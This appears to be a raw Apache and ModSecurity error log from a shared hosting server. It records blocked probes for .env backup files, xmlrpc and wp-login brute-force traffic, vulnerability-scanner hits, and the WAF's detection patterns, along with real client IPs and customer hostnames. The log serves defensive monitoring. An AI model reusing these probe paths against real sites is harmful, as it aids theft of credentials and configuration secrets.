[Tue May 26 12:49:48.456353 2026] [security2:error] [pid 448967:tid 449187] [client 208.84.100.229:25456] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.copy"] [unique_id "ahVJlOXLPuWQsfM-UVS1lwAAAFo"]
[Tue May 26 12:49:48.456420 2026] [security2:error] [pid 448967:tid 449154] [client 208.84.100.229:25358] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.production~"] [unique_id "ahVJlOXLPuWQsfM-UVS1mAAAADk"]
[Tue May 26 12:49:48.456870 2026] [security2:error] [pid 448967:tid 449212] [client 208.84.100.229:25550] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.production.bak"] [unique_id "ahVJlOXLPuWQsfM-UVS1jAAAAHM"]
[Tue May 26 12:49:48.457379 2026] [security2:error] [pid 448967:tid 449191] [client 208.84.100.229:25566] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.production.old"] [unique_id "ahVJlOXLPuWQsfM-UVS1ggAAAF4"]
[Tue May 26 12:49:49.697058 2026] [security2:error] [pid 448967:tid 449184] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJleXLPuWQsfM-UVS1qAAAAFc"]
[Tue May 26 12:49:53.073260 2026] [security2:error] [pid 448967:tid 449135] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJmOXLPuWQsfM-UVS1-wAAACY"]
[Tue May 26 12:49:56.022519 2026] [autoindex:error] [pid 448967:tid 449194] [client 43.250.164.247:0] AH01276: Cannot serve directory /home2/ucdccoin/public_html/upload/gallery/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.ucdc.co.in/gallery
[Tue May 26 12:49:56.040707 2026] [security2:error] [pid 448967:tid 449165] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJm-XLPuWQsfM-UVS2cQAAAEQ"]
[Tue May 26 12:49:56.101140 2026] [security2:error] [pid 448967:tid 449110] [client 157.20.138.61:50883] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJm-XLPuWQsfM-UVS2eQAAAA0"]
[Tue May 26 12:49:56.101278 2026] [security2:error] [pid 448967:tid 449110] [client 157.20.138.61:50883] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJm-XLPuWQsfM-UVS2eQAAAA0"]
[Tue May 26 12:49:58.680739 2026] [security2:error] [pid 448967:tid 449111] [client 74.249.173.207:40711] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/ioxi-o.php"] [unique_id "ahVJnuXLPuWQsfM-UVS23AAAAA4"]
[Tue May 26 12:49:58.774099 2026] [security2:error] [pid 448967:tid 449146] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJnuXLPuWQsfM-UVS2zwAAADE"]
[Tue May 26 12:50:00.142877 2026] [proxy:error] [pid 448967:tid 449133] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 12:50:00.142948 2026] [proxy_http:error] [pid 448967:tid 449133] [client 185.169.4.152:61359] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: binance.com
[Tue May 26 12:50:00.143535 2026] [proxy:error] [pid 448967:tid 449133] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 12:50:00.143570 2026] [proxy_http:error] [pid 448967:tid 449133] [client 185.169.4.152:61359] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: binance.com
[Tue May 26 12:50:00.766356 2026] [autoindex:error] [pid 448967:tid 449154] [client 43.166.244.192:0] AH01276: Cannot serve directory /home2/glorolle/public_html/aeromodellingconsultants.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://www.aeromodellingconsultants.com
[Tue May 26 12:50:01.726593 2026] [security2:error] [pid 448967:tid 449212] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJoeXLPuWQsfM-UVS3IgAAAHM"]
[Tue May 26 12:50:01.761114 2026] [security2:error] [pid 448967:tid 449098] [client 14.191.221.166:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJoeXLPuWQsfM-UVS3JQAAAAE"]
[Tue May 26 12:50:04.375039 2026] [security2:error] [pid 448967:tid 449151] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJo-XLPuWQsfM-UVS3awAAADY"]
[Tue May 26 12:50:05.837310 2026] [security2:error] [pid 448967:tid 449173] [client 66.249.82.96:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVJpOXLPuWQsfM-UVS3dAAAAEw"]
[Tue May 26 12:50:06.565100 2026] [security2:error] [pid 448967:tid 449167] [client 157.20.138.61:51231] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJpuXLPuWQsfM-UVS3twAAAEY"]
[Tue May 26 12:50:06.565275 2026] [security2:error] [pid 448967:tid 449167] [client 157.20.138.61:51231] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJpuXLPuWQsfM-UVS3twAAAEY"]
[Tue May 26 12:50:07.233463 2026] [security2:error] [pid 448967:tid 449150] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJpuXLPuWQsfM-UVS3vwAAADU"]
[Tue May 26 12:50:09.450255 2026] [security2:error] [pid 448967:tid 449127] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJqeXLPuWQsfM-UVS3-QAAAB4"]
[Tue May 26 12:50:11.441656 2026] [autoindex:error] [pid 448967:tid 449102] [client 20.17.176.186:56878] AH01276: Cannot serve directory /home2/svijakqj/operatives.org.in/.well-known/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 12:50:13.087803 2026] [security2:error] [pid 448967:tid 449182] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJrOXLPuWQsfM-UVS4WAAAAFU"]
[Tue May 26 12:50:13.702463 2026] [security2:error] [pid 448967:tid 449179] [client 178.20.43.173:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVJreXLPuWQsfM-UVS4eQAAAFI"], referer: http://anujtradingco.com/homepages/shop-parallax/
[Tue May 26 12:50:13.730413 2026] [security2:error] [pid 448967:tid 449017] [remote 92.117.185.70:60518] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 70.185.117.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-login.php"] [unique_id "ahVJreXLPuWQsfM-UVS4cwAAFjE"]
[Tue May 26 12:50:14.931564 2026] [security2:error] [pid 448967:tid 449121] [client 70.37.27.114:0] ModSecurity: Warning. Matched phrase "Claritybot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.yourstorybag.com"] [uri "/wp-content/cache/wp-rocket/www.yourstorybag.com/index-https.html_gzip"] [unique_id "ahVJruXLPuWQsfM-UVS4oAAAABg"]
[Tue May 26 12:50:14.932859 2026] [security2:error] [pid 448967:tid 449208] [client 70.37.27.114:31723] ModSecurity: Warning. Matched phrase "Claritybot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.yourstorybag.com"] [uri "/"] [unique_id "ahVJruXLPuWQsfM-UVS4ngAAAG8"]
[Tue May 26 12:50:15.459712 2026] [security2:error] [pid 448967:tid 449073] [remote 74.7.241.58:43640] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVJr-XLPuWQsfM-UVS4rQAAK2k"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/shop/wp-content/plugins/yith-woocommerce-wishlist/plugin-fw/templates/sysinfo/tabs
[Tue May 26 12:50:15.764614 2026] [security2:error] [pid 448967:tid 449193] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJr-XLPuWQsfM-UVS4qQAAAGA"]
[Tue May 26 12:50:17.015477 2026] [security2:error] [pid 448967:tid 449143] [client 157.20.138.61:51592] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJseXLPuWQsfM-UVS41wAAAC4"]
[Tue May 26 12:50:17.015594 2026] [security2:error] [pid 448967:tid 449143] [client 157.20.138.61:51592] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJseXLPuWQsfM-UVS41wAAAC4"]
[Tue May 26 12:50:18.908885 2026] [security2:error] [pid 448967:tid 449173] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJsuXLPuWQsfM-UVS4_wAAAEw"]
[Tue May 26 12:50:21.740936 2026] [security2:error] [pid 448967:tid 449099] [client 66.249.64.171:61683] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVJtOXLPuWQsfM-UVS5PgAAAAI"], referer: https://doyecpa.com/prizes/47689460
[Tue May 26 12:50:22.429259 2026] [security2:error] [pid 448967:tid 449172] [client 110.177.177.77:12616] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "obinnawrites.com"] [uri "/"] [unique_id "ahVJtuXLPuWQsfM-UVS5bAAAAEs"]
[Tue May 26 12:50:22.581606 2026] [security2:error] [pid 448967:tid 449163] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJtuXLPuWQsfM-UVS5YQAAAEI"]
[Tue May 26 12:50:24.078325 2026] [security2:error] [pid 448967:tid 449199] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJt-XLPuWQsfM-UVS5iQAAAGY"]
[Tue May 26 12:50:24.245739 2026] [autoindex:error] [pid 448967:tid 449154] [client 15.204.183.221:0] AH01276: Cannot serve directory /home2/glorolle/public_html/gldmarsa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://gldmarsa.com/
[Tue May 26 12:50:26.534449 2026] [autoindex:error] [pid 448967:tid 449204] [client 15.204.183.221:0] AH01276: Cannot serve directory /home2/glorolle/public_html/glorodbalsa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://glorodbalsa.com/
[Tue May 26 12:50:26.561137 2026] [security2:error] [pid 448967:tid 449111] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJuuXLPuWQsfM-UVS5ygAAAA4"]
[Tue May 26 12:50:27.687460 2026] [security2:error] [pid 448967:tid 449187] [client 14.169.232.74:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJu-XLPuWQsfM-UVS56QAAAFo"]
[Tue May 26 12:50:28.691200 2026] [security2:error] [pid 448967:tid 449208] [client 157.20.138.61:51967] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJvOXLPuWQsfM-UVS6DAAAAG8"]
[Tue May 26 12:50:28.691323 2026] [security2:error] [pid 448967:tid 449208] [client 157.20.138.61:51967] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJvOXLPuWQsfM-UVS6DAAAAG8"]
[Tue May 26 12:50:29.167695 2026] [security2:error] [pid 448967:tid 449172] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJvOXLPuWQsfM-UVS6FQAAAEs"]
[Tue May 26 12:50:30.365895 2026] [security2:error] [pid 448967:tid 448986] [remote 57.141.2.39:58099] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 39.2.141.57.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahVJvuXLPuWQsfM-UVS6QQAAZhI"]
[Tue May 26 12:50:32.914309 2026] [security2:error] [pid 448967:tid 449207] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJwOXLPuWQsfM-UVS6fgAAAG4"]
[Tue May 26 12:50:34.836167 2026] [security2:error] [pid 448967:tid 449170] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJwuXLPuWQsfM-UVS6ugAAAEk"]
[Tue May 26 12:50:37.766416 2026] [security2:error] [pid 448967:tid 449160] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJxeXLPuWQsfM-UVS7DwAAAD8"]
[Tue May 26 12:50:39.143303 2026] [security2:error] [pid 448967:tid 449197] [client 157.20.138.61:52328] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJx-XLPuWQsfM-UVS7PAAAAGQ"]
[Tue May 26 12:50:39.143412 2026] [security2:error] [pid 448967:tid 449197] [client 157.20.138.61:52328] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJx-XLPuWQsfM-UVS7PAAAAGQ"]
[Tue May 26 12:50:39.867055 2026] [proxy:error] [pid 448967:tid 449183] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 12:50:39.867124 2026] [proxy_http:error] [pid 448967:tid 449183] [client 205.210.31.131:61018] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 12:50:39.867769 2026] [proxy:error] [pid 448967:tid 449183] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 12:50:39.867813 2026] [proxy_http:error] [pid 448967:tid 449183] [client 205.210.31.131:61018] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 12:50:41.193301 2026] [security2:error] [pid 448967:tid 449148] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJyOXLPuWQsfM-UVS7cQAAADM"]
[Tue May 26 12:50:43.512151 2026] [security2:error] [pid 448967:tid 449140] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJy-XLPuWQsfM-UVS7pAAAACs"]
[Tue May 26 12:50:43.857142 2026] [security2:error] [pid 448967:tid 449207] [client 139.180.224.202:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVJy-XLPuWQsfM-UVS7uQAAAG4"], referer: https://anujtradingco.com
[Tue May 26 12:50:46.713504 2026] [security2:error] [pid 448967:tid 449195] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJzuXLPuWQsfM-UVS8LwAAAGI"]
[Tue May 26 12:50:48.807867 2026] [autoindex:error] [pid 448967:tid 449134] [client 185.217.125.16:55584] AH01276: Cannot serve directory /home1/moesartc/public_html/preetishah.com/wp-admin/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 12:50:49.439164 2026] [security2:error] [pid 448967:tid 449125] [client 85.208.96.206:30126] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/fun/list/"] [unique_id "ahVJ0eXLPuWQsfM-UVS8oAAAABw"]
[Tue May 26 12:50:49.439309 2026] [security2:error] [pid 448967:tid 449125] [client 85.208.96.206:30126] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/fun/list/"] [unique_id "ahVJ0eXLPuWQsfM-UVS8oAAAABw"]
[Tue May 26 12:50:49.533890 2026] [security2:error] [pid 448967:tid 449203] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJ0eXLPuWQsfM-UVS8kgAAAGo"]
[Tue May 26 12:50:49.644724 2026] [security2:error] [pid 448967:tid 449114] [client 157.20.138.61:52687] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJ0eXLPuWQsfM-UVS8qAAAABE"]
[Tue May 26 12:50:49.644875 2026] [security2:error] [pid 448967:tid 449114] [client 157.20.138.61:52687] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJ0eXLPuWQsfM-UVS8qAAAABE"]
[Tue May 26 12:50:52.413029 2026] [security2:error] [pid 448967:tid 449151] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJ0-XLPuWQsfM-UVS87gAAADY"]
[Tue May 26 12:50:54.030252 2026] [security2:error] [pid 448967:tid 449137] [client 184.189.77.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJ1eXLPuWQsfM-UVS9HQAAACg"]
